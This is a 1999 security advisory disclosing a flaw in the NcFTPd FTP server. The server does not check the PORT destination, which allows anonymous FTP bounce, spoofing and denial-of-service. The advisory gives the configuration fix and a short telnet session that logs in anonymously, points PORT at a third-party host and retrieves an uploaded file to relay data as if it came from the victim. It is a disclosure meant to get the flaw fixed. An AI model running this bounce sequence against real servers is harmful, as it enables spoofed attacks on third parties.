Proof of Concept - Security Advisory 02/16/99 http://poc.csoft.net Released by poc@csoft.net sw3wn@poc.csoft.net --- Affected Program NcFTPd <http://www.ncftp.com> Description FTP server (commercial) Severity Can port anywhere / spoof Synopsis: NcFTPd is a commercial FTP (File Transfer Protocol) server, in the NcFTP product line. The source code is not publicly released. Overview: To initiate a FTP transfer, there must be two connections, one control connection (server's ftp port), and one data connection. When a client wants to tell the server where to send the data (ie. a file you want to download, or a directory listing), it must use the command PORT - in which the destination address and port is specified. Problem: NcFTPd does not check that the destination PORT address is the user's IP. This means anybody can transmit data from the server anywhere, anonymously. Obviously this can lead to potential 'easy' DoS attacks and spoofing (say, someone uploads a file containing commands of something to incoming, PORT to some host/port, and use RETR (retrieve file)). Such connections are possible with the default NcFTPd configuration, but can be disallowed: general.cf> allow-outgoing-proxy-data-connection-ports-below-1024 - no general.cf> allow-proxy-connections - no I made an example program that listens on a port and dumps arbitrary received data in string, hex or ascii/hex format - [http://poc.csoft.net/code/listerine/listerine.tar.gz] Example: evil:$ telnet victim ftp # victim runs NcFTPd user anonymous # anonymous is up by default pass some@thing port 192,168,0,1,5,131 # connect on port 1411 retr incoming/stuff # send arbitrary data, as it # was coming from host victim. To see for yourself, you can run my example program `listerine', on the host victim. I tested this on my LAN and on remote machines too. Status: Got response from authors, the problem can be fixed indeed with the general.cf options mentionned above, but are not enabled with default configuration. .sw3